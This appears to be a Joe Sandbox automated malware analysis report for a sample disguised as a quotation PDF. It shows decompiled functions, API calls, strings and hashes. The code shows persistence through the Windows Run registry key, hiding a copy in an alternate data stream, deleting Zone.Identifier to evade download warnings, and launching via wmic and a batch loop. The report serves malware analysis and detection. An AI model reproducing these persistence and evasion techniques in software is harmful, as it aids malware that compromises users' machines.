						_v156 = E00406B4A(E00406E4B( &_v20, __eflags,  &_v160));
						E00421E99(_v156, _v152, _v148);
						E00406B06();
						E00406B06();
						E0041EC89( &_v164,  &_v12,  &_v28);
						E00406BE2();
						E00422116(E00406BE2(),  &_v13);
						E00406BE2();
						E00406BE2();
					}
					__eflags = _a8;
					if(__eflags == 0) {
						L20:
						E00406F64( &_v44, E00406F44( &_v12)); // executed
						_t187 = E00406F64( &_v200, L":Zone.Identifier"); // executed
						E00406A55( &_v44, __eflags, _t187); // executed
						E00406BE2(); // executed
						DeleteFileW(E00406F44( &_v44)); // executed
						_v204 = 1;
						E00406BE2(); // executed
						E00406BE2(); // executed
						E00406BE2(); // executed
						return _v204;
					} else {
						__eflags = _a4;
						if(_a4 == 0) {
							_t125 =  &_v8; // 0x42437a
							__eflags =  *_t125 + 0x20;
							E00406BFC( *_t125 + 0x20,  &_v12);
						}
						_t126 =  &_v8; // 0x42437a
						_v168 =  *_t126 + 4;
						_t128 =  &_v8; // 0x42437a
						_t129 =  &_v8; // 0x42437a
						_t201 = E00420997(_v168,  *((intOrPtr*)( *_t129 + 8)),  *_t128 + 0x14, 0x20006, 0);
						__eflags = _t201;
						if(_t201 != 0) {
							_t137 =  &_v8; // 0x42437a
							_v188 =  *_t137 + 4;
							_t139 =  &_v8; // 0x42437a
							_v180 = E00406610( &_v220,  *_t139 + 0x20);
							_t142 =  &_v8; // 0x42437a
							_v176 =  *_t142 + 0x30;
							_v184 = E0040AFE0(_v176,  &_v192);
							_t211 = E004208BD(_v188, _v184, _v180, 1);
							__eflags = _t211;
							if(_t211 != 0) {
								_t151 =  &_v52;
								 *_t151 = _v52 & 0x00000000;
								__eflags =  *_t151;
							} else {
								_v52 = 1;
							}
							_v14 = _v52;
							E00406BE2();
							E004066DA();
							__eflags = _v14 & 0x000000ff;
							if((_v14 & 0x000000ff) == 0) {
								_t163 =  &_v8; // 0x42437a
								__eflags =  *_t163 + 4;
								E004207E9( *_t163 + 4);
								goto L20;
							} else {
								_v196 = _v196 & 0x00000000;
								E00406BE2();
								E00406BE2();
								return _v196;
							}
						} else {
							_v172 = _v172 & 0x00000000;
							E00406BE2();
							E00406BE2();
							return _v172;
						}
					}
				}
				_t425 = _a4;
				if(_a4 == 0) {
					goto L5;
				}
				_t12 =  &_v8; // 0x42437a
				_t277 = E0041E9F8(_t330, _t425,  &_v60,  *((intOrPtr*)( *_t12 + 0xc)));
				_t15 =  &_v8; // 0x42437a
				E00406BFC( *_t15 + 0x20, _t277);
				E00406BE2();
				_t17 =  &_v8; // 0x42437a
				E0041E21C( &_v60,  *_t17 + 0x20);
				_t18 =  &_v8; // 0x42437a
				_v64 =  *_t18 + 0x20;
				_v76 = E00406C53(_v64, _t425, "\\");
				_t22 =  &_v8; // 0x42437a
				_v68 =  *_t22 + 0x30;
				_v72 = E0040B01B(_v68,  &_v80);
				E00406CC1(_v76, _v72);
				E00406BE2();
				_t30 =  &_v8; // 0x42437a
				_t295 = E0041EC89( &_v80,  &_v12,  *_t30 + 0x20);
				_pop(_t404);
				if(_t295 != 0) {
					_t37 =  &_v8; // 0x42437a
					_v88 =  *_t37 + 0x20;
					_t39 =  &_v8; // 0x42437a
					_v92 =  *_t39 + 0x30;
					_push(_t404);
					E00406991(_v88, __eflags, _t420);
					E0040AE9F(_v92, _t420);
					E0040BA16(__eflags,  &_v212, _v88, _v88, _t404);
					_t420 = _t420 + 0x14;
					_t44 =  &_v8; // 0x42437a
					_v96 =  *_t44;
					_t46 =  &_v8; // 0x42437a
					E00420997(_v96, 0x80000001,  *_t46 + 0x10, 0xf003f, 0);
					_t48 =  &_v8; // 0x42437a
					_v100 =  *_t48;
					_t51 =  &_v8; // 0x42437a
					E004208BD(_v100,  *_t51 + 0x18,  &_v212, 3);
					_t53 =  &_v8; // 0x42437a
					__eflags =  *_t53 + 0x20;
					E00406F64( &_v40, E00406F44( *_t53 + 0x20));
					E00406A55( &_v40,  *_t53 + 0x20, E00406F64( &_v104, L":Zone.Identifier"));
					E00406BE2();
					DeleteFileW(E00406F44( &_v40));
					E00406BE2();
					E004066DA();
					goto L5;
				}
				_v84 = _v84 & 0x00000000;
				E00406BE2();
				E00406BE2();
				return _v84;
			}

0x00420ab3
0x00420aba
0x00420ac6
0x00420acd
0x00420ad0
0x00420ada
0x00420ae9
0x00420aee
0x00420af1
0x00420af1
0x00420af4
0x00420afd
0x00420c7f
0x00420c7f
0x00420c82
0x00420c87
0x00420c89
0x00420c8b
0x00420c8e
0x00420c98
0x00420c9b
0x00420ca7
0x00420ca7
0x00420cac
0x00420cb0
0x00420cc3
0x00420ccf
0x00420cdc
0x00420ce9
0x00420cff
0x00420d0f
0x00420d1a
0x00420d22
0x00420d2f
0x00420d48
0x00420d61
0x00420d6d
0x00420d7b
0x00420d86
0x00420d8b
0x00420d95
0x00420da4
0x00420db1
0x00420dc7
0x00420dd8
0x00420de5
0x00420df2
0x00420e0e
0x00420e2a
0x00420e42
0x00420e50
0x00420e5b
0x00420e68
0x00420e72
0x00420e82
0x00420e8a
0x00420e92
0x00420e92
0x00420e97
0x00420e9b
0x00420fc7
0x00420fd3
0x00420fe3
0x00420fec
0x00420ff7
0x00421005
0x0042100b
0x00421018
0x00421020
0x00421028
0x00000000
0x00420ea1
0x00420ea1
0x00420ea5
0x00420eab
0x00420eae
0x00420eb1
0x00420eb1
0x00420eb6
0x00420ebc
0x00420ec9
0x00420ed0
0x00420edc
0x00420ee1
0x00420ee3
0x00420f07
0x00420f0d
0x00420f13
0x00420f25
0x00420f2b
0x00420f31
0x00420f49
0x00420f63
0x00420f68
0x00420f6a
0x00420f75
0x00420f75
0x00420f75
0x00420f6c
0x00420f6c
0x00420f6c
0x00420f7c
0x00420f85
0x00420f90
0x00420f99
0x00420f9b
0x00420fbc
0x00420fbf
0x00420fc2
0x00000000
0x00420f9d
0x00420f9d
0x00420fa7
0x00420faf
0x00000000
0x00420fb4
0x00420ee5
0x00420ee5
0x00420eef
0x00420ef7
0x00000000
0x00420efc
0x00420ee3
0x00420e9b
0x00420b03
0x00420b07
0x00000000
0x00000000
0x00420b0d
0x00420b17
0x00420b1f
0x00420b25
0x00420b2d
0x00420b32
0x00420b39
0x00420b3f
0x00420b45
0x00420b55
0x00420b58
0x00420b5e
0x00420b6d
0x00420b76
0x00420b7e
0x00420b83
0x00420b8e
0x00420b94
0x00420b97
0x00420bb5
0x00420bbb
0x00420bbe
0x00420bc4
0x00420bc7
0x00420bcd
0x00420bd8
0x00420be4
0x00420be9
0x00420bec
0x00420bef
0x00420bf9
0x00420c08
0x00420c0d
0x00420c10
0x00420c1c
0x00420c26
0x00420c2b
0x00420c2e
0x00420c3a
0x00420c50
0x00420c58
0x00420c66
0x00420c6f
0x00420c7a
0x00000000
0x00420c7a
0x00420b99
0x00420ba0
0x00420ba8
0x00000000

APIs

Part of subcall function 0041EA3F: GetModuleFileNameW.KERNEL32(00000000,?,000003E8,?,00000000,Software\Microsoft\Windows\CurrentVersion\Explorer\,dBB), ref: 0041EA65

Part of subcall function 00420768: RegCreateKeyExW.KERNEL32(0000000A,00000000,00000000,00000000,?,B,00000000,00000000,00000000,00420AEE), ref: 004207B1

Part of subcall function 004207E9: RegCloseKey.KERNEL32(004241D6,004241D6,?,004207E7,004241D2,?,00420AA0,?,?,004241D6), ref: 004207FD

DeleteFileW.KERNEL32(00000000,00000000,:Zone.Identifier,00000000,zCB,?,00000003,80000001,zCB,000F003F,00000000,00000000,80000001,zCB,000F003F,00000001), ref: 00420C66
SHGetKnownFolderPath.SHELL32(00426390,00000000,00000000,?,80000001,zCB,000F003F,00000001), ref: 00420CC3

Part of subcall function 0041E9F8: SHGetSpecialFolderPathW.SHELL32(00000000,?,00000000,00000000), ref: 0041EA25

Part of subcall function 00406BFC: lstrcpyW.KERNEL32 ref: 00406C46

Part of subcall function 0041E21C: SHCreateDirectoryExW.SHELL32(00000000,00000000,00000000,?,?,00420B3E,zCB,00000000,80000001,zCB,000F003F,00000001), ref: 0041E22D

Part of subcall function 0041EC89: CopyFileW.KERNEL32(?,?,00000000,?,?,?,00420E6D,?,?,00000000,wmic process call create '",\Documents:ApplicationData,for /F "usebackq tokens=*" %%A in (",\programs.bat,?), ref: 0041ECAC

Strings

for /F "usebackq tokens=*" %%A in (", xrefs: 00420CE1
wmic process call create '", xrefs: 00420DA9
\programs.bat, xrefs: 00420CD4
zCB, xrefs: 00420ACD, 00420ADA, 00420AF1, 00420C7F, 00420EB6, 00420EC9, 00420ED0, 00420F07, 00420F13, 00420F2B, 00420FBC, 00420EAB, 00420D8B, 00420C8B, 00420C98, 00420B0D, 00420B1F, 00420B32, 00420B3F, 00420B58, 00420B83, 00420BB5, 00420BBE, 00420BEC, 00420BF9, 00420C0D, 00420C1C, 00420C2B, 00420AE0, 00420B38, 00420B89, 00420BC7, 00420BC8, 00420BFF, 00420C22, 00420C9E, 00420ECF, 00420F19
") do %%A, xrefs: 00420D12
:Zone.Identifier, xrefs: 00420C3F
:start, xrefs: 00420DDD
:start, xrefs: 00420D02
:Zone.Identifier, xrefs: 00420FD8
\Documents:ApplicationData, xrefs: 00420D9C

Memory Dump Source

Source File: 00000003.00000002.586825371.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.586825371.0000000000561000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_order_of_quotationpdf.jbxd

Yara matches

Similarity

API ID: File$CreateFolderPath$CloseCopyDeleteDirectoryKnownModuleNameSpeciallstrcpy
String ID: ") do %%A$:Zone.Identifier$:Zone.Identifier$:start$:start$\Documents:ApplicationData$\programs.bat$for /F "usebackq tokens=*" %%A in ("$wmic process call create '"$zCB
API String ID: 1853471255-1775673102
Opcode ID: 3ee82e2667dc142ef61790c6b1fd37656c8965ea35ef704daf6d6d0a43c3d5f4
Instruction ID: 98d378a52ece863946518d893e432ead923cea59f298b51300d651684f104688
Opcode Fuzzy Hash: 3ee82e2667dc142ef61790c6b1fd37656c8965ea35ef704daf6d6d0a43c3d5f4
Instruction Fuzzy Hash: 6CF12C71D042189BDB14EBA5DD92BEDB7B4AF04308F5140AEE006B7192EF386E95CF58

Uniqueness

Uniqueness Score: -1.00%

Function 00421037 Relevance: 16.0, APIs: 3, Strings: 6, Instructions: 208
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 98%

			E00421037(intOrPtr __ecx, void* __eflags, char _a4) {
				intOrPtr _v8;
				char _v12;
				char _v16;
				intOrPtr _v20;
				char _v24;
				char _v28;
				char _v32;
				char _v36;
				intOrPtr _v40;
				char _v44;
				char _v48;
				WCHAR* _v52;
				WCHAR* _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				char _v68;
				char _v72;
				char _v80;
				char _v88;
				void* _t86;
				void* _t89;
				void* _t95;
				void* _t98;
				void* _t101;
				void* _t104;
				intOrPtr _t110;
				void* _t112;
				void* _t115;
				intOrPtr _t116;
				signed int _t118;
				void* _t122;
				signed int _t129;
				intOrPtr _t130;
				intOrPtr _t197;
				void* _t217;
				void* _t219;

				_t219 = __eflags;
				_v8 = __ecx;
				_t2 =  &_a4; // 0x424264
				E0040488A(_v8 + 0x30,  *_t2); // executed
				_t86 = E0040486A(_v8 + 0x30, _t219); // executed
				_t220 = _t86;
				if(_t86 == 0) {
					 *((intOrPtr*)(_v8 + 8)) = 0x80000001;
					 *((intOrPtr*)(_v8 + 0xc)) = 5;
				} else {
					 *((intOrPtr*)(_v8 + 8)) = 0x80000002;
					 *((intOrPtr*)(_v8 + 0xc)) = 5;
				}
				_t89 = E00406F64( &_v16, L"Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\"); // executed
				E00406BFC(_v8 + 0x10, _t89); // executed
				E00406BE2(); // executed
				_v20 = _v8 + 0x10;
				_t95 = E0040AFC3(_a4,  &_v24); // executed
				E00406CC1(_v20, _t95); // executed
				E00406BE2(); // executed
				_t98 = E00406F64( &_v28, L"inst"); // executed
				E00406BFC(_v8 + 0x18, _t98); // executed
				E00406BE2();
				_t101 = E00406F64( &_v32, L"InitWindows"); // executed
				E00406BFC(_v8 + 0x1c, _t101); // executed
				E00406BE2();
				_t104 = E00406F64( &_v36, L"Software\\Microsoft\\Windows\\CurrentVersion\\Run\\"); // executed
				E00406BFC(_v8 + 0x14, _t104); // executed
				E00406BE2();
				_v40 = _v8;
				_t110 = E00420997(_v40, 0x80000001, _v8 + 0x10, 0xf003f, 0); // executed
				 *((intOrPtr*)(_v8 + 0x24)) = _t110;
				_t112 = E0041EA3F(_t220,  &_v44); // executed
				E00406BFC(_v8 + 0x20, _t112); // executed
				E00406BE2();
				_t188 = _a4;
				_t115 = E0040AFFD(_a4);
				_t221 = _t115;
				if(_t115 == 0) {
					L7:
					_t116 = _v8;
					__eflags =  *(_t116 + 0x24);
					if( *(_t116 + 0x24) == 0) {
						return _t116;
					}
					E00406692( &_v80);
					_t118 = E0040B038(_a4);
					__eflags = _t118;
					if(_t118 != 0) {
						_v60 = _v8;
						_t197 = _v60;
						_t129 = E0042080B(_t197, _v8 + 0x18,  &_v80);
						__eflags = _t129;
						if(_t129 == 0) {
							_t130 = _v8;
							_t78 = _t130 + 0x28;
							 *_t78 =  *(_t130 + 0x28) & 0x00000000;
							__eflags =  *_t78;
						} else {
							_push(_t197);
							_t198 = _t217;
							E004066FC(_t217,  &_v80);
							E0040AE9F(_a4, _t217);
							_v64 = E0040BA16(__eflags,  &_v88, _t217, _t198, _t197);
							E00406BFC(_v8 + 0x20, E00406458(_v64, __eflags,  &_v68));
							E00406BE2();
							E004066DA();
							 *((intOrPtr*)(_v8 + 0x28)) = 1;
						}
					}
					__eflags = E0040B00C(_a4);
					if(__eflags != 0) {
						_t122 = E0041EA3F(__eflags,  &_v72);
						__eflags = _v8 + 0x20;
						E00406BFC(_v8 + 0x20, _t122);
						E00406BE2();
					}
					return E004066DA();
				} else {
					E0041E9F8(_t188, _t221,  &_v12,  *((intOrPtr*)(_v8 + 0xc)));
					E00406C53( &_v12, _t221, L"\\Documents:ApplicationData");
					E00406BFC(_v8 + 0x20, E0041EA3F(_t221,  &_v48));
					E00406BE2();
					_v52 = CharLowerW(E00406F44( &_v12));
					_v56 = CharLowerW(E00406F44(_v8 + 0x20));
					if(lstrcmpW(_v56, _v52) != 0) {
						E00406BE2();
						goto L7;
					}
					 *((intOrPtr*)(_v8 + 0x24)) = 1;
					return E00406BE2();
				}
			}

0x00421037
0x0042103d
0x00421040
0x00421049
0x0042104e
0x00421053
0x00421055
0x00421070
0x0042107a
0x00421057
0x0042105a
0x00421064
0x00421064
0x00421089
0x00421095
0x0042109d
0x004210a8
0x004210b2
0x004210bb
0x004210c3
0x004210d0
0x004210dc
0x004210e4
0x004210f1
0x004210fd
0x00421105
0x00421112
0x0042111e
0x00421126
0x0042112e
0x00421147
0x0042114f
0x00421156
0x00421163
0x0042116b
0x00421170
0x00421173
0x00421178
0x0042117a
0x00421212
0x00421212
0x00421215
0x00421219
0x004212e5
0x004212e5
0x00421222
0x0042122a
0x0042122f
0x00421231
0x00421236
0x00421244
0x00421247
0x0042124c
0x0042124e
0x004212ab
0x004212ae
0x004212ae
0x004212ae
0x00421250
0x00421250
0x00421252
0x00421258
0x00421263
0x00421274
0x0042128a
0x00421292
0x0042129a
0x004212a2
0x004212a2
0x0042124e
0x004212ba
0x004212bc
0x004212c2
0x004212cc
0x004212cf
0x004212d7
0x004212d7
0x00000000
0x00421180
0x0042118a
0x00421199
0x004211af
0x004211b7
0x004211cb
0x004211e0
0x004211f1
0x0042120d
0x00000000
0x0042120d
0x004211f6
0x00000000
0x00421200

APIs

CharLowerW.USER32(00000000,00000000,\Documents:ApplicationData,00000000,80000001,?,000F003F,00000000,00000000,Software\Microsoft\Windows\CurrentVersion\Run\,00000000,InitWindows,00000000,inst,00000000,?), ref: 004211C5
CharLowerW.USER32(00000000), ref: 004211DA
lstrcmpW.KERNEL32(?,?), ref: 004211E9

Strings

InitWindows, xrefs: 004210E9
inst, xrefs: 004210C8
dBB, xrefs: 00421040
\Documents:ApplicationData, xrefs: 00421191
Software\Microsoft\Windows\CurrentVersion\Explorer\, xrefs: 00421081
Software\Microsoft\Windows\CurrentVersion\Run\, xrefs: 0042110A

Memory Dump Source

Source File: 00000003.00000002.586825371.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.586825371.0000000000561000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_order_of_quotationpdf.jbxd

Yara matches

Similarity

API ID: CharLower$lstrcmp
String ID: InitWindows$Software\Microsoft\Windows\CurrentVersion\Explorer\$Software\Microsoft\Windows\CurrentVersion\Run\$\Documents:ApplicationData$dBB$inst
API String ID: 2246673981-3192961300
Opcode ID: 1725771f1c55eb29d3f02eeb293db60b7e3095b5f41d6421d6bdc4180bcb8d85
Instruction ID: 371f67bb1e8527ece1dd767f01070c89f0a0b862762837ab7b1f1107828cfda8
Opcode Fuzzy Hash: 1725771f1c55eb29d3f02eeb293db60b7e3095b5f41d6421d6bdc4180bcb8d85
Instruction Fuzzy Hash: A4810070900118EFDB04EBA5D992AEDB7B9AF04308F51406EF402F7292DB78AF55DB58

Uniqueness

Uniqueness Score: -1.00%

Function 00422FF3 Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 176
comCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 18%

			E00422FF3(intOrPtr __ecx) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed short* _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				char _v40;
				signed int _v44;
				signed int _v48;
				intOrPtr _v52;
				signed int _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				intOrPtr _v80;
				intOrPtr _v84;
				signed int _v88;
				signed short* _v96;
				char _v104;
				void* _t107;
				void* _t112;
				void* _t121;
				signed int _t161;

				_v80 = __ecx;
				__imp__CoInitialize(0); // executed
				_v16 = _v16 & 0x00000000;
				_v28 = _v28 & 0x00000000;
				_v12 = _v12 & 0x00000000;
				_v88 = _v88 & 0x00000000;
				_t107 = E004045FD( &_v28);
				__imp__CoCreateInstance(0x426420, 0, 1, 0x42a488, _t107); // executed
				if(_v28 != 0) {
					_v52 =  *((intOrPtr*)( *_v28 + 0xc));
					_t112 = _v52(_v28, 0x426410,  &_v12, 0);
					__eflags = _v12;
					if(_v12 != 0) {
						 *((intOrPtr*)( *_v12 + 0x14))(_v12);
						_t22 =  &_v24;
						 *_t22 = _v24 & 0x00000000;
						__eflags =  *_t22;
						while(1) {
							__eflags = 1;
							if(1 == 0) {
								break;
							}
							_v56 = _v56 & 0x00000000;
							_v60 =  *((intOrPtr*)( *_v12 + 0xc));
							_v8 = _v60(_v12, 1,  &_v40,  &_v56);
							__eflags = _v8;
							if(_v8 == 0) {
								_v64 = _v40 + _v24 * 4;
								_v68 =  *((intOrPtr*)( *((intOrPtr*)(_v40 + _v24 * 4)) + 0x24));
								_v8 = _v68(_v64, 0, 0, 0x4263a0,  &_v16);
								__eflags = _v8;
								if(_v8 == 0) {
									__imp__#8( &_v104);
									_v72 =  *((intOrPtr*)( *_v16 + 0xc));
									_v8 = _v72(_v16, L"Description",  &_v104, 0);
									__eflags = _v8;
									if(_v8 != 0) {
										_v76 =  *((intOrPtr*)( *_v16 + 0xc));
										_v8 = _v76(_v16, L"FriendlyName",  &_v104, 0);
									}
									__eflags = _v8;
									if(_v8 == 0) {
										_v44 = E0040B8BA(0x1c);
										__eflags = _v44;
										if(__eflags == 0) {
											_t72 =  &_v48;
											 *_t72 = _v48 & 0x00000000;
											__eflags =  *_t72;
										} else {
											_v48 = E004233F9(_v44, __eflags);
										}
										_v36 = _v48;
										_v20 = _v96;
										_v32 = _v32 & 0x00000000;
										while(1) {
											__eflags =  *_v20 & 0x0000ffff;
											if(( *_v20 & 0x0000ffff) == 0) {
												break;
											}
											 *((short*)( *((intOrPtr*)(_v36 + 4)) + _v32 * 2)) =  *_v20;
											 *((char*)( *_v36 + _v32)) =  *_v20 & 0xff;
											_v32 = _v32 + 1;
											_t161 =  &(_v20[1]);
											__eflags = _t161;
											_v20 = _t161;
										}
										 *((intOrPtr*)(_v36 + 8)) = _v24;
										_v84 = _v80 + 4;
										E00404BC3(_v84, _v36);
										_v24 = _v24 + 1;
										continue;
									} else {
										break;
									}
								}
								break;
							}
							break;
						}
						E00404D45( &_v12);
						_t121 = E00404D45( &_v28);
						__imp__CoUninitialize();
						return _t121;
					}
					return _t112;
				}
				return _t107;
			}

0x00422ff9
0x00422ffe
0x00423004
0x00423008
0x0042300c
0x00423010
0x00423018
0x0042302d
0x00423037
0x00423046
0x00423057
0x0042305a
0x0042305e
0x0042306d
0x00423070
0x00423070
0x00423070
0x00423074
0x00423076
0x00423077
0x00000000
0x00000000
0x0042307d
0x00423089
0x0042309c
0x0042309f
0x004230a3
0x004230b3
0x004230c2
0x004230d8
0x004230db
0x004230df
0x004230ea
0x004230f8
0x0042310c
0x0042310f
0x00423113
0x0042311d
0x00423131
0x00423131
0x00423134
0x00423138
0x00423147
0x0042314a
0x0042314e
0x0042315d
0x0042315d
0x0042315d
0x00423150
0x00423158
0x00423158
0x00423164
0x0042316a
0x0042316d
0x00423182
0x00423188
0x0042318a
0x00000000
0x00000000
0x0042319b
0x004231b2
0x00423177
0x0042317e
0x0042317e
0x0042317f
0x0042317f
0x004231bd
0x004231c6
0x004231cf
0x004231d8
0x00000000
0x0042313a
0x00000000
0x0042313a
0x00423138
0x00000000
0x004230e1
0x00000000
0x004230a5
0x004231e4
0x004231ee
0x004231f4
0x00000000
0x004231f4
0x00000000
0x0042305e
0x00000000

APIs

CoInitialize.OLE32(00000000), ref: 00422FFE
CoCreateInstance.OLE32(00426420,00000000,00000001,0042A488,00000000), ref: 0042302D

Strings

Description, xrefs: 00423101
FriendlyName, xrefs: 00423126

Memory Dump Source

Source File: 00000003.00000002.586825371.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.586825371.0000000000561000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_order_of_quotationpdf.jbxd

Yara matches

Similarity

API ID: CreateInitializeInstance
String ID: Description$FriendlyName
API String ID: 3519745914-3192352273
Opcode ID: d81858b06f548883afe6d25520a46523a207a662da04b01ba5497f3021e66364
Instruction ID: 69323b63218c5b523a6b6d0a3ff929ab146dd72a48e576a554de4ada6821663a
Opcode Fuzzy Hash: d81858b06f548883afe6d25520a46523a207a662da04b01ba5497f3021e66364
Instruction Fuzzy Hash: 1871C274E00219EFDB00DF94D885BEDBBB4FF08316F60406AE911A7290D778AA55CF65

Uniqueness

Uniqueness Score: -1.00%

Function 0042211F Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 45
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E0042211F(CHAR* _a4, char _a8) {
				void* _v8;
				long _v12;
				char _v16;
				long _v20;
				int _v24;
				void* _t22;
				int _t26;

				_v16 = E00401000(0x2800000);
				_v20 = _v20 & 0x00000000;
				_t22 = CreateFileA(_a4, 0x80000000, 0, 0, 3, 0x80, 0); // executed
				_v8 = _t22;
				if(_v8 == 0xffffffff) {
					_t7 =  &_a8; // 0x424121
					 *( *_t7) =  *( *_t7) & 0x00000000;
				}
				_v12 = GetFileSize(_v8, 0);
				_t10 =  &_a8; // 0x424121
				 *((intOrPtr*)( *_t10)) = _v12;
				_t14 =  &_v16; // 0x424121
				_t26 = ReadFile(_v8,  *_t14, _v12,  &_v20, 0); // executed
				_v24 = _t26;
				if(_v24 == 0) {
					_t18 =  &_a8; // 0x424121
					 *( *_t18) =  *( *_t18) & 0x00000000;
				}
				FindCloseChangeNotification(_v8); // executed
				return _v16;
			}

0x00422130
0x00422133
0x0042214c
0x00422152
0x00422159
0x0042215b
0x0042215e
0x0042215e
0x0042216c
0x0042216f
0x00422175
0x00422180
0x00422186
0x0042218c
0x00422193
0x00422195
0x00422198
0x00422198
0x0042219e
0x004221a8

APIs

Part of subcall function 00401000: GetProcessHeap.KERNEL32(00000000,02800000,0042212F,02800000,?,?,00424121,?,00000000), ref: 00401006
Part of subcall function 00401000: RtlAllocateHeap.NTDLL(00000000,?,?,00424121,?,00000000), ref: 0040100D

CreateFileA.KERNEL32(?,80000000,00000000,00000000,00000003,00000080,00000000), ref: 0042214C
GetFileSize.KERNEL32(000000FF,00000000), ref: 00422166
ReadFile.KERNEL32(?,!AB,?,00000000,00000000), ref: 00422186
FindCloseChangeNotification.KERNEL32(?), ref: 0042219E

Strings

!AB, xrefs: 00422180
!AB, xrefs: 0042216F, 0042215B, 00422195

Memory Dump Source

Source File: 00000003.00000002.586825371.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.586825371.0000000000561000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_order_of_quotationpdf.jbxd

Yara matches

Similarity

API ID: File$Heap$AllocateChangeCloseCreateFindNotificationProcessReadSize
String ID: !AB$!AB
API String ID: 2557216016-1979610608
Opcode ID: 02ddb11e7cfa6d4f66c1ba9be06445847222a860ac4cd7131c60acffaa86f760
Instruction ID: f12a1944feab464098ba97fded65a6528a61054159515f3875baf3eadccf10d8
Opcode Fuzzy Hash: 02ddb11e7cfa6d4f66c1ba9be06445847222a860ac4cd7131c60acffaa86f760
Instruction Fuzzy Hash: 2D11F734A00208FFDB21DF94DD46BADBBB0EB04725F2080A5F911BA2A0C7B46B50DF58

Uniqueness

Uniqueness Score: -1.00%

Function 004061A5 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 133
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 49%

			E004061A5(void* __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
				char _v5;
				signed int _v12;
				signed int _v16;
				char _v20;
				char _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				signed int _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				char _v56;
				char _v108;
				char _v368;
				short _v888;
				intOrPtr _t54;
				intOrPtr _t57;
				intOrPtr _t60;
				void* _t63;
				void* _t65;
				void* _t70;
				void* _t76;
				void* _t93;
				void* _t95;
				void* _t96;
				void* _t97;
				void* _t113;
				void* _t114;
				void* _t116;

				_t116 = __eflags;
				_t110 = __edx;
				E0041E533(__edx,  &_v24); // executed
				E0041E344( &_v20,  &_v20); // executed
				GetModuleFileNameA(0,  &_v368, 0x104);
				E00422285( &_v5);
				_v12 = _v12 & 0x00000000;
				_t54 = E0042211F( &_v368,  &_v12); // executed
				_pop(_t91);
				_v28 = _t54;
				_v16 = _v16 & 0x00000000;
				E00421C2F(_t110, _v28, _v12, 0x10ad,  &_v16);
				_t114 = _t113 + 0x10; // executed
				_t57 = E0041E63C(_t110); // executed
				_v32 = _t57;
				_v36 = _v16;
				_v40 = E0041E9A4();
				_t60 = E0041E932(); // executed
				_v44 = _t60;
				_v48 = E0041E681();
				_v52 = E00401555();
				_t63 = E00406F44( &_v20);
				_t93 = _t114; // executed
				E00406F64(_t93, _t63); // executed
				_push(_t93);
				_t65 = E00406F44( &_v24);
				_t95 = _t114; // executed
				E00406F64(_t95, _t65); // executed
				_push(_v32);
				_push(_v36);
				_push(_t95);
				_t96 = _t114;
				E00406F64(_t96, 0x426498); // executed
				E0041EAAC(_t114); // executed
				_t97 = _t96;
				_push(_v40);
				_push(_v44);
				_push(_v48);
				_push(_v52);
				_push(_t97);
				_push(_t97);
				E0041EAE4(_t116, _t114); // executed
				_t70 = E00408697( &_v108); // executed
				E00409811(_a4, _t70); // executed
				E00408646( &_v108, _t116); // executed
				if(E0040B4B7(_a8) != 0) {
					E0040132F( &_v888, 0, 0x208);
					__imp__SHGetFolderPathW(0, 0x1c, 0, 0,  &_v888);
					lstrcatW( &_v888, L"\\Microsoft Vision\\");
					CreateDirectoryW( &_v888, 0);
					E00413FD7(0x560720, _a4, 1);
					E00409811(_a4, E0042453E( &_v56));
					_t73 = E00424524( &_v56);
				}
				E00422116(_t73,  &_v5);
				E00406BE2(); // executed
				_t76 = E00406BE2(); // executed
				return _t76;
			}

0x004061a5
0x004061a5
0x004061b3
0x004061bd
0x004061d1
0x004061da
0x004061df
0x004061ee
0x004061f4
0x004061f5
0x004061f8
0x0040620b
0x00406210
0x00406213
0x00406218
0x0040621e
0x00406226
0x00406229
0x0040622e
0x00406236
0x0040623e
0x00406247
0x0040624d
0x0040624f
0x00406254
0x0040625a
0x00406260
0x00406262
0x00406267
0x0040626a
0x0040626d
0x0040626e
0x00406275
0x0040627c
0x00406281
0x00406282
0x00406285
0x00406288
0x0040628b
0x0040628e
0x0040628f
0x00406291
0x0040629a
0x004062a3
0x004062ab
0x004062ba
0x004062ca
0x004062e1
0x004062f3
0x00406302
0x00406312
0x00406323
0x0040632b
0x0040632b
0x00406333
0x0040633b
0x00406343
0x0040634a

APIs

Part of subcall function 0041E344: CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 0041E35C
Part of subcall function 0041E344: CoInitialize.OLE32(00000000), ref: 0041E367

GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 004061D1

